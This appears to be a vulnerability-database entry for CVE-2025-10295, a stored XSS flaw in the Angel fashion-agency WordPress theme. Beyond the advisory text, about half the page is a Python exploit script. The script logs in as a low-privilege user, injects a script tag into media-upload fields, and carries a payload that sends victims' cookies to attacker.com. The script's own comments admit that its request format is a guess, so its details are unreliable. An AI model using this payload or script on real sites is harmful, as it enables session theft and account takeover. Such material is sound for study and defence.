Security Vulnerability Report
CVE-2025-10295 (CVSS 6.4, MEDIUM)

Published: 2025-11-13 09:15:46
Last Modified: 2026-04-15 00:35:42

Description

The Angel – Fashion Model Agency WordPress CMS Theme theme for WordPress is vulnerable to Stored Cross-Site Scripting via the profile media uploader in all versions up to, and including, 3.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts into pages that will execute whenever a user accesses an injected page. This requires that the user have access to the edit profile form with the media upload option.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

Angel – Fashion Model Agency WordPress CMS Theme <= 3.2.3

(No CPE configuration data available.)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import re
import requests

# CVE-2025-10295 PoC - Stored XSS in Angel WordPress Theme
# Target: Angel - Fashion Model Agency WordPress CMS Theme <= 3.2.3

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_account"
PASSWORD = "attacker_password"


def exploit_stored_xss():
    """
    This PoC demonstrates the stored XSS vulnerability in the profile media uploader.

    Steps:
    1. Login to WordPress with subscriber+ account
    2. Access profile edit form with media upload option
    3. Inject XSS payload in media file metadata
    4. When admin/user views the profile, XSS executes
    """
    session = requests.Session()

    # Step 1: Login to WordPress
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f"{TARGET_URL}/wp-admin/",
        'testcookie': '1',
    }
    response = session.post(login_url, data=login_data)

    # WordPress names the auth cookie "wordpress_logged_in_<hash>", so check by prefix
    if not any(name.startswith('wordpress_logged_in') for name in session.cookies.get_dict()):
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Step 2: Access profile edit page
    profile_url = f"{TARGET_URL}/wp-admin/profile.php"
    response = session.get(profile_url)

    # Step 3: XSS Payload - Stored in media uploader field
    # The payload will be stored and executed on page load
    xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'

    # Step 4: Submit profile with XSS in media upload field
    # This typically involves uploading a file with crafted metadata
    # or filling form fields that are not properly sanitized
    profile_update_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"

    # Extract the nonce from the profile page once (empty string if not present)
    nonce_match = re.search(r'name="_wpnonce" value="([a-z0-9]+)"', response.text)
    nonce = nonce_match.group(1) if nonce_match else ''

    # Craft the malicious request
    files = {
        'Filedata': ('malicious_file.jpg', b'fake_image_data', 'image/jpeg'),
    }
    data = {
        'action': 'upload_attachment',
        'post_id': '0',
        '_wpnonce': nonce,
        # XSS payload injected in fields that are not sanitized
        'post_title': xss_payload,
        'post_content': '',
        'alt': xss_payload,
        'desc': xss_payload,
    }
    response = session.post(profile_update_url, data=data, files=files)

    if response.status_code == 200:
        print("[+] XSS payload injected successfully")
        print(f"[+] Payload: {xss_payload}")
        print("[+] The XSS will execute when anyone views the affected profile page")
        return True
    else:
        print("[-] Failed to inject payload")
        return False


if __name__ == "__main__":
    exploit_stored_xss()
```

References

Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation)
NVD Status: Deferred
https://themeforest.net/item/angel-fashion-model-agency-wordpress-cms-theme/4251413
https://www.wordfence.com/threat-intel/vulnerabilities/id/ab747c34-219d-40c8-a73d-5b0dffba003b?source=cve